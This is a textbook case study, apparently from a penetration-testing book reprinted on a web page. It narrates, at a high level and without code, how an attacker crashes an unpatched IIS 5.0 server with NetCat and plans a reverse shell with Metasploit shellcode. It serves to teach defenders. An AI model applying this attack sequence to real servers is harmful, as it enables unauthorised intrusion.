Case Study

Previous page
Table of content
Next page
 < Day Day Up > 

The following case study displays the basic thought processes of a hacker when contemplating execution of a buffer overflow.

In this scenario, Evil Jimmy has stumbled across the new Windows 2000 IIS 5.0 web servers of Little Company Network (LCN). He is out to prove that LCN has just made a mistake with this implementation of IIS. Jimmy does a little research and finds a handy, potential buffer overflow vulnerability in an un-service packed IIS 5.0. This particular vulnerability exploits the printer DLL and can allow system-level access to the servers discovered by Eeye (see http://www.eeye.com/html/Research/Advisories/AD20010501.html).

Step 1.

Jimmy goes to the LCN home page to confirm that the server is up and running. Using Internet Explorer, he connects the server at http://192.168.200.21/printers. This is his baseline tool for testing whether the server is online. As he attacks, he always refreshes this browser to see if he has crashed the system. Figure 14-4 displays the LCN printer web page.

Figure 14-4. Printer Web Page


Note

For more details on hacking IIS, see "Windows 2000 IIS 5.0 Remote Buffer Overflow Vulnerability (Remote SYSTEM Level Access)" at http://www.eeye.com/html/Research/Advisories/AD20010501.html.

Step 2.

Evil Jimmy connects to the web server using NetCat to pass a large amount of data to the web server. Jimmy knows of a potential buffer overflow attack within the HOST portion of a request (see Figure 14-5).

Figure 14-5. Using NetCat


Step 3.

Jimmy tests the browser to see if the request succeeded in shutting down the web server. You can see from Figure 14-6 that it was indeed a success.

Figure 14-6. Web Server Not Responding


To double check, Jimmy tests the server again and notices that the server is back online. This is a good indication that the server service just restarted IIS and continued to run.

Step 4.

Now that Jimmy knows the server is vulnerable, he would like to create a reverse shell from the web server to his computer. Needing shellcode to do this, he heads off to a website called Metasploit at http://www.metasploit.com/, which contains several different code samples to help him. Figure 14-7 shows the Windows Reverse Shell code sample.

Figure 14-7. Metasploit Example Code


Step 5.

From here, it is easy for Jimmy to combine the shell code into an automated executable that sends the exploit to the web server and creates a reverse shell back to his computer.

This case study shows at a high level a basic attack and buffer overflow test against a server. Many specific overflows are documented on the Internet, enabling you to learn and practice your programming skills. As a penetration tester, you can use buffer overflow testing to help detect the ability to crash servers a tell-tale symptom that a larger attack is possible.

     < Day Day Up > 

    Previous page
    Table of content
    Next page
    Penetration Testing and Network Defense
    Penetration Testing and Network Defense
    ISBN: 1587052083
    EAN: 2147483647
    Year: 2005
    Pages: 209
    Authors: Andrew Whitaker, Daniel Newman
    BUY ON AMAZON
    CISSP Exam Cram 2
    A Practitioners Guide to Software Test Design
    GO! with Microsoft Office 2003 Brief (2nd Edition)
    InDesign Type: Professional Typography with Adobe InDesign CS2
    Telecommunications Essentials, Second Edition: The Complete Global Source (2nd Edition)
    Comparing, Designing, and Deploying VPNs
    flylib.com © 2008-2017.
    If you may any questions please contact us: flylib@qtcs.net
    Privacy policy